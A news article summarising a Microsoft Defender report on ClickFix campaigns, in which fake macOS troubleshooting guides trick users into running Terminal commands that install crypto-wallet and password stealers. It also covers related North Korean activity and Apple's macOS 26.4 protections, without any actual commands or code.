Microsoft: Deployed ClickFix on a fake macOS troubleshooting page to steal crypto wallet keys

According to Cryptopolitan on May 11, the Microsoft Defender security research team released its investigation results, finding that attackers have published fake macOS troubleshooting guides on platforms such as Medium and Craft since the end of 2025, tricking users into executing malicious commands in the terminal, thereby installing malware to steal crypto wallet keys, iCloud data, and browser-stored passwords.

Attack Mechanism: ClickFix Bypasses macOS Gatekeeper

According to a report by the Microsoft Defender security research team, attackers use a social engineering technique called ClickFix: they post macOS troubleshooting guides disguised as “freeing up disk space” or “fixing system errors” on platforms such as Medium, Craft, and Squarespace, prompting users to copy malicious commands and paste them into macOS Terminal; once the commands are executed, the malware is automatically downloaded and launched.

According to Microsoft’s report, this method bypasses the macOS Gatekeeper security mechanism because Gatekeeper enforces code signature and notarization verification for applications executed via Finder, but the way users run commands directly in Terminal is not constrained by this verification step. Researchers also found that attackers use curl, osascript, and other native macOS tools to execute malicious code directly in memory (fileless attacks), making standard antivirus tools difficult to detect.

Malware Families, Theft Scope, and Special Mechanisms

According to Microsoft’s report, this campaign involves three malware families (AMOS, Macsync, SHub Stealer) and three types of installers (Loader, Script, Helper). The targeted data to be stolen includes:

Crypto wallet keys: Exodus, Ledger, Trezor

Account credentials: iCloud, Telegram

Browser-stored passwords: Chrome, Firefox

Private documents and photos: local files less than 2 MB

After the malware is installed, it displays a fake dialog box asking users to enter the system password to install a “helper tool”; if the user enters the password, the attacker can obtain full access to files and system settings. Microsoft’s report also notes that in some cases, attackers delete the legitimate Trezor Suite, Ledger Wallet, and Exodus applications and replace them with trojaned versions to monitor transactions and steal funds. In addition, the malicious software loader includes a kill switch: if an Arabic keyboard layout is detected, the malware will automatically stop execution.

Related Attack Activity and Apple Protection Measures

According to a report by ANY.RUN security researchers, the Lazarus Group has launched a hacking operation called “Mach-O Man,” using the same techniques as ClickFix, targeting financial technology and cryptocurrency companies with macOS as the primary operating system through fake meeting invitation lures.

Cryptopolitan also reported that the North Korean hacker group Famous Chollima uses AI-generated code to implant malicious npm packages into cryptocurrency trading projects. The malware uses a two-layer obfuscation architecture to steal wallet data and sensitive system information.

According to the report, Apple has added protective measures in macOS 26.4 to prevent commands marked as potentially malicious from being pasted into the macOS Terminal.

FAQ

When did the ClickFix macOS attack activity disclosed by Microsoft Defender begin, and on which platforms was it published?

Based on reporting from the Microsoft Defender security research team and Cryptopolitan on May 11, 2026, the attack activity became actively active starting at the end of 2025. Attackers published fake macOS troubleshooting guides on platforms such as Medium, Craft, and Squarespace, prompting Mac users to execute malicious Terminal commands.

Which crypto wallets and types of data does this attack activity target?

According to the Microsoft Defender report, malware involved (AMOS, Macsync, SHub Stealer) can steal crypto wallet keys from Exodus, Ledger, and Trezor, as well as account data from iCloud and Telegram, and usernames and passwords stored in Chrome and Firefox.

What protective measures has Apple introduced against this type of attack?

According to the report, Apple has added protection mechanisms in macOS 26.4 to block potentially malicious commands from being pasted into macOS Terminal, reducing the success rate of ClickFix-type social engineering attacks.